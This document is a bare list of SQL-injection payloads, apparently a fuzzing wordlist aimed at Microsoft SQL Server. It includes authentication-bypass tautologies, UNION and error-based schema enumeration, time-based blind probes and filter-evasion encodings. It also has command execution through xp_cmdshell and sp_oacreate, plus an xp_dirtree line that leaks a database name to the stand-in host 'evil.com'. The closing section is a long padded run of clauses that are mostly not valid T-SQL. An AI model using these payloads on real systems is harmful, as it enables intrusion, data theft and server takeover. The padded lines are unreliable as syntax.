' OR '1'='1'--
' AND 1=1--
' OR 1=1/*
' OR 'x'='x
' OR 1=CONVERT(int,@@version)--
UNION ALL SELECT NULL--
UNION SELECT @@version,NULL--
UNION SELECT table_name,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL FROM information_schema.columns--
UNION SELECT TOP 1 name,NULL FROM sys.databases--
AND 1=CONVERT(int,@@version)
OR 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))
AND 1=CONVERT(int,(SELECT CHAR(65)+CHAR(66)+CHAR(67)))
IF (1=1) WAITFOR DELAY '0:0:5'--
IF (SELECT COUNT(*) FROM sys.objects)>0 WAITFOR DELAY '0:0:2'--
SELECT @@version
SELECT system_user
SELECT db_name()
SELECT @@servername
SELECT session_user
SELECT current_user
SELECT name FROM sys.databases
SELECT table_name FROM information_schema.tables
SELECT column_name FROM information_schema.columns
SELECT * FROM information_schema.schemata
SELECT * FROM sys.objects WHERE type='U'
SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT HAS_PERMS_BY_NAME(NULL, 'SERVER', 'IMPERSONATE ANY LOGIN')
EXEC xp_cmdshell 'whoami'
EXEC xp_dirtree 'C:\',1,1
EXEC xp_fileexist 'C:\Windows\System32\drivers\etc\hosts'
EXEC xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion','ProductName'
DECLARE @o int EXEC sp_oacreate 'wscript.shell',@o out EXEC sp_oamethod @o,'run',NULL,'cmd /c ver'
SELECT * FROM OPENROWSET('SQLNCLI','Server=.;Trusted_Connection=yes;','SELECT @@version')
'/**/OR/**/1=1--
'%0AOR%0A1=1--
'%09UNION%09SELECT%09@@version--
'/*!50000OR*/1=1--
0x27204f5220313d312d2d
0x2720554e494f4e2053454c45437420312d2d
' OR 'adm'+'in'='admin'--
' UNION SELECT 'ver'+'sion','db'+'name'--
' oR 1=1--
' uNiOn sElEcT @@version--
'%09OR%091=1--
'%0AUNION%0ASELECT%0A@@version--
'%0DOR%0D1=1--
'%00' OR 1=1--
'%00' UNION SELECT @@version--
; EXEC('SELECT @@version')--
; EXEC('SELECT name FROM sys.databases')--
EXEC('SELECT @@version')
EXEC sp_executesql N'SELECT @@version'
SELECT CAST((SELECT name FROM sys.databases FOR XML PATH('')) AS varchar(max))
EXEC xp_dirtree '\\'+CAST((SELECT TOP 1 name FROM sys.databases) AS varchar(8000))+'.evil.com\share'
SELECT * FROM sys.configurations
SELECT * FROM sys.dm_exec_connections
SELECT * FROM sys.dm_os_sys_info
EXEC msdb.dbo.sp_send_dbmail @recipients='test@example.com',@query='SELECT @@version'
EXEC msdb.dbo.sp_help_job
SELECT * FROM sys.assemblies
SELECT * FROM sys.assembly_files
SELECT CAST(@@version AS xml)
SELECT CONVERT(varbinary, @@version)
SELECT @@language
SELECT @@max_connections
SELECT @@servicename
SELECT * FROM sys.database_permissions
SELECT * FROM sys.server_permissions
SELECT AUTHENTICATE('test','test')
SELECT * FROM sys.sql_logins
SELECT * FROM sys.endpoints
EXEC xp_availablemedia
EXEC xp_subdirs 'C:\'
INSERT INTO table VALUES ('test'' OR 1=1--')
UPDATE table SET column='test'' OR 1=1--' WHERE id=1
SELECT * FROM sys.dm_exec_sessions
SELECT * FROM sys.dm_exec_requests
DECLARE @data varchar(8000) DECLARE c CURSOR FOR SELECT name FROM sys.databases OPEN c FETCH NEXT FROM c INTO @data
SELECT * FROM fn_virtualfilestats(1,1)
SELECT * FROM fn_trace_gettable('C:\trace.trc', default)
SELECT * FROM OPENJSON('{"test":"value"}')
BACKUP DATABASE master TO DISK = 'C:\backup.bak' WITH COPY_ONLY
RESTORE FILELISTONLY FROM DISK = 'C:\backup.bak'
DBCC CHECKDB('master')
DBCC USEROPTIONS
EXEC xp_servicecontrol 'querystate','SQLSERVERAGENT'
EXEC sp_who
EXEC sp_who2
SELECT * FROM OPENQUERY(LOCALSERVER,'SELECT @@version')
SELECT * FROM sys.stats
SELECT * FROM sys.dm_db_index_usage_stats
SELECT * FROM sys.partitions
SELECT * FROM sys.triggers
SELECT OBJECT_DEFINITION(OBJECT_ID('sys.databases'))
SELECT CRYPT_GEN_RANDOM(16)
SELECT * FROM sys.fulltext_catalogs
SELECT * FROM sys.policy_management_policies
SELECT * FROM sys.dm_server_audit_status
SELECT * FROM sys.dm_resource_governor_configuration
SELECT * FROM sys.query_store_runtime_stats
SELECT * FROM sys.tables WHERE temporal_type <> 0
SELECT * FROM sys.tables WHERE is_node = 1 OR is_edge = 1
SELECT * FROM sys.column_encryption_keys
SELECT * FROM sys.external_libraries
SELECT * FROM sys.filetables
SELECT * FROM sys.ledger_table_history

' OR 1=1ᅴ--
' OR 1=1℅--
' OR 1=1⁣--
' OR 1=1᠁--
' OR 1=1%EF%BC%8D%EF%BC%8D (Fullwidth hyphen)
' OR 1=1%EF%B9%A3 (Arabic semicolon)
' OR 1=1%EF%BB%BF (BOM character)
' OR 1=0x1--
' OR 1=3-2--
' OR 1=1|1--
' OR 1=1^0--
' OR 1=1&1--
' OR 1=~0--
' OR 1=1<<0--
' OR 1=1>>0--
' OR JSON_VALUE('{"a":1}','$.a')=1--
' OR ARRAY[1,2,3][1]=2--
' OR 1=REPLACE(1,0,1)--
' OR 1=ASCII(CHAR(49))--
' OR 1=UNICODE(N'1')--
' OR 1=AT TIME ZONE 'UTC'--
' OR 1=SWITCHOFFSET(GETDATE(),'+00:00')--
' OR 1=1 COLLATE SQL_Latin1_General_CP1_CI_AS--
' OR 'a'='A' COLLATE Latin1_General_BIN--
' OR 1=ROW_NUMBER() OVER(ORDER BY 1)--
' OR 1=RANK() OVER(ORDER BY 1)--
' OR 1=(SELECT 1 FROM (SELECT 1 AS x) AS src PIVOT(MAX(x) FOR x IN([1])) AS pvt)--
' OR 1=(SELECT TOP 1 1 FROM sys.objects OUTER APPLY sys.fn_helpcollations())--
' OR 1=PARTITION(1 BY 1)--
' OR 1=NEXT VALUE FOR seq_name--
' OR 1=1 FOR SYSTEM_TIME ALL--
' OR 1=SHORTEST_PATH((:A)-[:R]->(:B))--
' OR 1=PREDICT(MODEL=model_name,DATA=1)--
' OR 1=EXTERNAL_SCRIPT('R','1+1')--
' OR 1=geometry::STGeomFromText('POINT (1 1)',0).STX--
' OR 1=CONTAINS(column,'"1"')--
' OR 1=1 IN SEMANTICKEYPHRASETABLE(table,column,'1').keyphrase--
' OR 1=GET_FILESTREAM_TRANSACTION_CONTEXT()--
' OR 1=RECEIVE(1 FROM queue)--
' OR 1=1 OPTION(USE HINT('FORCE_LEGACY_CARDINALITY_ESTIMATION'))--
' OR 1=1 WITH (MEMORY_OPTIMIZED=ON)--
' OR 1=1 WITH (COLUMNSTORE)--
' OR 1=1 WITH (SCHEMA_ONLY)--
' OR 1=COMPRESS('1')--
' OR 1=ENCRYPTBYKEY(KEY_GUID('key_name'),'1')--
' OR 1=1 WITH (MASKING=FUNCTION 'default()')--
' OR 1=1 WITH (MASK=OFF)--
' OR 1=1 WITH (SECURITY POLICY=OFF)--
' OR 1=1 WITH (LEDGER=ON)--
' OR 1=1 WITH (HYPERSCALE=ON)--
' OR 1=1 WITH (REMOTE_DATA_ARCHIVE=ON)--
' OR 1=1 WITH (DATA_SOURCE=external_source)--
' OR 1=1 WITH (PARTITION=1)--
' OR 1=1 WITH (CHANGE_TRACKING_CONTEXT(1))--
' OR 1=1 WITH (CDC=ON)--
' OR 1=1 WITH (SYSTEM_VERSIONING=OFF)--
' OR 1=1 WITH (NODE=ON)--
' OR 1=1 WITH (EDGE=ON)--
' OR 1=JSON_PATH_EXISTS('{"a":1}','$.a')--
' OR 1=JSON_MODIFY('{"a":1}','$.a',2)--
' OR 1=1 FOR XML PATH(''), ROOT('root')--
' OR 1=1 WITH XMLNAMESPACES('uri' AS ns)--
' OR 1=1 WITH (XML INDEX=xml_index)--
' OR 1=1 WITH (XMLSCHEMA('uri','schema'))--
' OR 1=1 WITH (XML DML=ON)--
' OR 1=1 WITH (XML VIEW=ON)--
' OR 1=1 WITH (XML COLLECTION=collection)--
' OR 1=1 WITH (XML TEMPLATE=template)--
' OR 1=1 WITH (XML LOB=ON)--
' OR 1=1 WITH (XML SCHEMA COLLECTION=collection)--
' OR 1=1 WITH (XML INDEX VIEW=view)--
' OR 1=1 WITH (XML NAMESPACE=namespace)--
' OR 1=1 WITH (XML DATA TYPE=type)--
' OR 1=1 WITH (XML FORMAT=format)--
' OR 1=1 WITH (XML STORAGE=storage)--
' OR 1=1 WITH (XML PROCESSING=processing)--
' OR 1=1 WITH (XML VALIDATION=validation)--
' OR 1=1 WITH (XML SERIALIZATION=serialization)--
' OR 1=1 WITH (XML COMPRESSION=compression)--
' OR 1=1 WITH (XML ENCRYPTION=encryption)--
' OR 1=1 WITH (XML SIGNATURE=signature)--
' OR 1=1 WITH (XML TRANSFORM=transform)--
' OR 1=1 WITH (XML QUERY=query)--
' OR 1=1 WITH (XML VALUE=value)--
' OR 1=1 WITH (XML EXIST=exist)--
' OR 1=1 WITH (XML MODIFY=modify)--
